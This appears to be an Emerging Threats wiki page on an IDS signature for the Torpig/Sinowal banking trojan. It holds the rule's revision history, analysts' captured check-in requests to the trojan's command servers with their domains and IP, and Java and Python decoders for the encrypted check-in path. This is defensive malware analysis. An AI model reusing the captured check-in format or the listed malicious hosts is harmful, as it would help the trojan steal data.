EmergingThreats > Main Web > 2003590 (2007-06-22, OndrejPokorny)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID)"; flow:established,to_server; content:"User-Agent|3a| MSID ["; nocase; http_header; reference:url,doc.emergingthreats.net/2003590; classtype:trojan-activity; sid:2003590; rev:8;)

Added 2011-10-12 19:13:45 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID)"; flow:established,to_server; content:"User-Agent|3a| MSID ["; nocase; http_header; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:8;)

Added 2011-09-14 22:26:44 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID)"; flow:established,to_server; content:"User-Agent|3a| MSID ["; nocase; http_header; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader-5265; sid:2003590; rev:8;)

Added 2011-02-04 17:22:34 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader-5265; sid:2003590; rev:5;)

Added 2009-02-12 18:21:15 UTC



alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:4;)

Added 2008-01-31 10:12:23 UTC



alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:3;)

Added 2008-01-09 17:42:41 UTC



alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:3;)

Added 2008-01-09 15:15:19 UTC



alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:3;)

Added 2008-01-08 20:25:20 UTC



Added 2007-06-22

Use the FORCE, read the SOURCE :-), or reverse engineer! This is a snippet of Java code that will do the decryption. I didn't optimize it; it closely follows the trojan.

About the domain: a new domain is used every week. Before gjxuunj.com it was haygunj.com, before that dau8aym.com, before that lddpaym.com; this week it is rajjunj.com.

About the Panda presentation: they describe a different version of the trojan. Differences: use of an .exe instead of svchost.exe + .dll, the communication to the server is not encrypted, it uses a different server, and definitely more. I stay in touch with them.

import java.util.Base64;

// Decoder for the check-in path: base64 (padding stripped) -> XOR with the 32-character
// MSID value from the User-Agent -> reverse the hex spelling -> back to bytes.
public class TorpigDecode {

    public static void main(String[] args) {
        // path token from the captured POST and the MSID value from its User-Agent header
        decode("dBMFJAV3O2VkcWVw1ddn69QPWjtCW2fRVdMXlXLPU8cwRtHhBWXOQbBVYHRAouF/Fc8/DyO7ZyCkUndVp7pSV6Fm0SGRRa4kFRQgBNAyMbshKusPBloBp7PX0gBT/ydBkAOEpBVkWjU1JOBQdFN2K6FtXHxSXHd3xSXHxdYasmdQcTEBMSFcxRITEBMXBeF+pA", "CEB2BB8F6737C1282988A8D3F1DFE91D");
    }

    // bytes -> uppercase hex string
    static String toHex(byte[] s) {
        String transTable = "0123456789ABCDEF";
        StringBuffer sb = new StringBuffer();
        for (int i = 0; i < s.length; i++) {
            byte c = s[i];
            sb.append(transTable.charAt((c >> 4) & 0xf));
            sb.append(transTable.charAt(c & 0xf));
        }
        return sb.toString();
    }

    // reverse the string: this is the "half-byte shuffling", done on the hex spelling
    static String swap(String s) {
        StringBuffer sb = new StringBuffer();
        for (int i = s.length() - 1; i >= 0; i--) {
            sb.append(s.charAt(i));
        }
        return sb.toString();
    }

    // uppercase hex string (as produced by toHex) -> bytes
    static byte[] toBin(String s) {
        byte[] temp = new byte[s.length() / 2];
        for (int i = 0; i < s.length() / 2; i++) {
            byte work = (byte) s.charAt(2 * i);
            if (work > 0x39) {
                work = (byte) (work - 0x41 + 0xa);   // 'A'..'F' -> 10..15
            }
            byte c = (byte) ((work & 0xf) << 4);     // high nibble
            work = (byte) s.charAt(2 * i + 1);
            if (work > 0x39) {
                work = (byte) (work - 0x41 + 0xa);
            }
            c |= (byte) (work & 0xf);                // low nibble
            temp[i] = c;
        }
        return temp;
    }

    // repeating-key XOR
    static byte[] xor(byte[] message, byte[] key) {
        byte[] temp = new byte[message.length];
        for (int i = 0, keyIndex = 0; i < message.length; i++, keyIndex = (keyIndex + 1) % key.length) {
            temp[i] = (byte) (message[i] ^ key[keyIndex]);
        }
        return temp;
    }

    static byte[] decode(String s, String key) {
        // remove trailing A (= extra 0x0 from decoded)
        if (s.length() % 4 == 1 && s.charAt(s.length() - 1) == 'A') {
            s = s.substring(0, s.length() - 1);
        }
        // append the missing "=" padding; a remainder of 2 needs "==" (the lenient
        // sun.misc decoder accepted a single "=", java.util.Base64 does not).
        // A remainder of 1 is never valid base64, so that entry can only fail.
        String[] rem = {"", "===", "==", "="};
        String b64encoded = s + rem[s.length() % 4];
        try {
            byte[] b64decoded = Base64.getDecoder().decode(b64encoded);
            byte[] decrypted = xor(b64decoded, key.getBytes());
            String decryptedHex = toHex(decrypted);
            String swapped = swap(decryptedHex);
            byte[] result = toBin(swapped);
            System.out.println(new String(result));
            return result;
        } catch (IllegalArgumentException e) {
            e.printStackTrace();
            return null;
        }
    }
}
-- OndrejPokorny - 22 Jun 2007

Added 2007-06-22

Ondrej, I'm trying to decrypt the head of the request. Could you explain the encryption method in more detail, especially the part with half-byte shuffling? I know the xor and base64 methods :-). I saw this trojan talking to gjxuunj.com in June. Panda published a paper about this threat: link to eCrime 2007 Congress

-- DamianPetrus - 22 Jun 2007

Added 2007-06-04

I can decrypt the URL part (after /ewDf/):

id=CEB2BB8F6737C1282988A8D3F1DFE91D&sv=107&build=Paladin_IT&ts=1180093122&ip=192.168.136.128&sport=9045&hport=9078&os=5.1.2600&cn=United%20States

The key for decryption is inside the User-Agent (CEB...91D). The encryption method is based on shuffling half-bytes around the string, xoring with the key and finally base64 encoding.

I don't know how to decrypt the content of the request. But from my observations the amount of data sent corresponds to increments in the file \Windows\temp\$_2341233.tmp (hidden and system), at least for the version on my computer.

-- OndrejPokorny
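
As an added worked example (not code from the page, from the posters, or from the signature's authors), a Python port of the decoding described in the two OndrejPokorny posts above and in the Java snippet: it recognises the User-Agent the rule keys on, takes the 32-character MSID value from it as the key, and reverses the base64, XOR and half-byte shuffle on the request path. The request line, token and reported plaintext are copied from the captures on this page; the regular expression and function names are my own assumptions.

```python
import base64
import re

# What ET 2003590 keys on ("User-Agent: MSID [", case-insensitive) plus the "|build|version" tail seen above.
MSID_UA = re.compile(r"^User-Agent:\s*MSID \[([0-9A-F]{32})\]\|([^|\r\n]*)\|(\d+)", re.IGNORECASE | re.MULTILINE)

# Path token and request headers from the 2007-05-27 capture on this page (multipart body omitted).
CAPTURED_PATH_TOKEN = "dBMFJAV3O2VkcWVw1ddn69QPWjtCW2fRVdMXlXLPU8cwRtHhBWXOQbBVYHRAouF/Fc8/DyO7ZyCkUndVp7pSV6Fm0SGRRa4kFRQgBNAyMbshKusPBloBp7PX0gBT/ydBkAOEpBVkWjU1JOBQdFN2K6FtXHxSXHd3xSXHxdYasmdQcTEBMSFcxRITEBMXBeF+pA"
CAPTURED_HEADERS = ("POST /ewDf/" + CAPTURED_PATH_TOKEN + " HTTP/1.0\r\n"
                    "Host: lddpaym.net\r\n"
                    "User-Agent: MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107\r\n\r\n")
# The plaintext the 2007-06-04 post reports for that token (used for the round-trip check).
REPORTED_PLAINTEXT = (b"id=CEB2BB8F6737C1282988A8D3F1DFE91D&sv=107&build=Paladin_IT&ts=1180093122&ip=192.168.136.128"
                      b"&sport=9045&hport=9078&os=5.1.2600&cn=United%20States")

def find_msid_checkin(headers):
    """Return (key, build_tag, version) when the MSID User-Agent is present, else None."""
    m = MSID_UA.search(headers)
    return None if m is None else (m.group(1).upper(), m.group(2), int(m.group(3)))

def nibble_unshuffle(data):
    """The half-byte shuffle: reverse the hex spelling of the bytes and read it back.
    Doing it twice returns the input, so the same step serves encoding and decoding."""
    return bytes.fromhex(data.hex()[::-1])

def xor_with_key(data, key):
    k = key.encode("ascii")
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(data))

def decode_path(token, key):
    """Unpadded base64 -> XOR with the 32-char MSID key -> nibble unshuffle."""
    if len(token) % 4 == 1 and token.endswith("A"):  # quirk kept from the Java decoder above
        token = token[:-1]
    token += "=" * (-len(token) % 4)  # put back the padding the bot strips
    return nibble_unshuffle(xor_with_key(base64.b64decode(token), key))

def encode_path(plain, key):
    """Inverse of decode_path; lets the decoder be checked by round-trip."""
    return base64.b64encode(xor_with_key(nibble_unshuffle(plain), key)).decode().rstrip("=")

if __name__ == "__main__":
    key, build, version = find_msid_checkin(CAPTURED_HEADERS)
    print(f"MSID key {key}, build {build}, version {version}")
    print(decode_path(CAPTURED_PATH_TOKEN, key).decode("latin-1"))
```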

Added 2007-05-27

We were able to capture this guy from a web page (drive by download). It is pushing out these on submission of form data:

POST /ewDf/dBMFJAV3O2VkcWVw1ddn69QPWjtCW2fRVdMXlXLPU8cwRtHhBWXOQbBVYHRAouF/Fc8/DyO7ZyCkUndVp7pSV6Fm0SGRRa4kFRQgBNAyMbshKusPBloBp7PX0gBT/ydBkAOEpBVkWjU1JOBQdFN2K6FtXHxSXHd3xSXHxdYasmdQcTEBMSFcxRITEBMXBeF+pA HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: lddpaym.net
Content-Length: 999
Connection: Close
User-Agent: MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107
Pragma: no-cache

--swefasvqdvwxff
Content-Disposition: form-data; name=datafile; filename="data.str"
Content-Type: application/octet-stream

--swefasvqdvwxff--

Does anybody have an idea on how to get to the content of the submitted data? I already tried base64 decode...

Christian

-- ChristianSeifert - 2007-05-27

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.bleedingthreats.net/2003590; sid:2003590; rev:2;)

Added 2007-04-23 10:49:18 UTC

I have an infected computer (for research purposes) and have seen two versions of the trojan: grey (old version) and Build Vasi4 (after automatic update):

POST http://seksis1.com/XFsQa5/ddL0E2FGExU1EWK+BWaQBZGnc1owNyYU0VLWEuUOwicwF1Gm5QZixjG0UlsAo0TiBWazPwRWFnQQowcC1BpXVqFHIeYx1ycjBTFTGwBzRCJRknJ/UaMTEEWScoegbhInYEch5lF2J2R1oVMscCQEQhYCdrtnIGEkQEIHwjUaV0YXUFFmFQVx43CkA HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: seksis1.com
Content-Length: 1254
User-Agent: MSID [CD256AE062083071BAE834E73A4A694E]|grey|102

and

POST http://194.146.207.12/XFsQa5/ddL0E2FGExU1EWK+BWaQBZGnc1owNyYU0VLWEuUOwidAB7Gm5QZixjG0UmugQxTiBWazPwRWZtUgo7ciJdsX1lCXNaNUcsYTdTEDW0AjJOJ1Bid7pQNTUjBiZgfwr2NhkAL0o2FnJ3M1IeNfBFJjctEiUXsnBzZjcHK3FSIdJzZAd7E2FSJGZCJRYxt3BOR31A HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: 194.146.207.12
Content-Length: 607
User-Agent: MSID [CD256AE062083071BAE834E73A4A694E]|Build Vasi4|104
Pragma: no-cache

The site contacted has also been jdbpebf.com, seksis1.com (both stopped) and at this moment it is vgnyarm.com (or numeric, if DNS doesn't work). The malware steals user information (IE autocomplete fields, POP3 password, bookmarks, address book, filled forms sent to the internet) and also targets many sites, especially banking sites.

Have you seen other IPs than 194.146.207.0/24? Do you know anything about the infection? I know the site veslox.net/grey/, but it doesn't work anymore.

-- OndrejPokorny - 2007-04-23

Added 2007-04-16 13:15:18 UTC

'sun' in the User-Agent most likely refers to the directory which the compromised host visited and was led to the downloader from. For example, a directory like /ld/sun/ani.htm would lead to 'sun' being placed in the User-Agent for the GET check-in request. Other possible strings are 'grey', 'ment', 'guc' (though probably not all-inclusive).

-- JacobKitchel - 16 Apr 2007

This sig is working well for us. FYI, I've observed the word 'mentat' in the User-Agent following the "]|".

-- BenFeinstein - 19 Apr 2007

Thanks Ben. I bet the mentat, sun, etc are just tracking for the malware authors. It'll be interesting to see what others show up though.

-- MattJonkman - 19 Apr 2007

This is going to be a widely varied set of targets and malware. The UA comes from the initial infection, which is likely just a loader that knows a DNS name. Tracking them all is relatively futile, I think. Just block the initial load with these UAs and you should contain it.

Matt

-- MattJonkman - 23 Apr 2007

The UA is from the active trojan, not from the infection. The initial infection was carried out by different means: through Internet Explorer. It is true, however, that blocking communication with this UA prevents the trojan from obtaining its configuration (which is vital in my case) or sending data to the rogue site.

My previous question about IPs and DNS names was aimed at the possibility of guessing how many groups are using this code.

-- OndrejPokorny - 24 Apr 2007


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265 Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.bleedingthreats.net/2003590; sid:2003590; rev:1;)

Added 2007-04-16 13:01:18 UTC

Regular downloader, but it has an unusual UA and GET string:

GET /XFsQa5/ARACIHdzNmUUBxBxoacX4tEEIEJAWmLSJ9JrlgbHJAClNSbld2HDQcAj1UVEIpF2EMRFdiFaYtJXY9oWYtNFUOVB01QzlQIBJKcRAeQHhKdgFCACQCqSVwNSDCEiIhLANQVGIqNyIWJlMlUSIzIhVSNWJhInOiJkUFPrA6c HTTP/1.0
User-Agent: MSID [6FE60F5FFAF67AB172BAC9A0408E11FC]|sun|104
Host: xipdarm.com
Pragma: no-cache

-- MattJonkman - 16 Apr 2007


Topic revision: r12 - 2007-06-22 - OndrejPokorny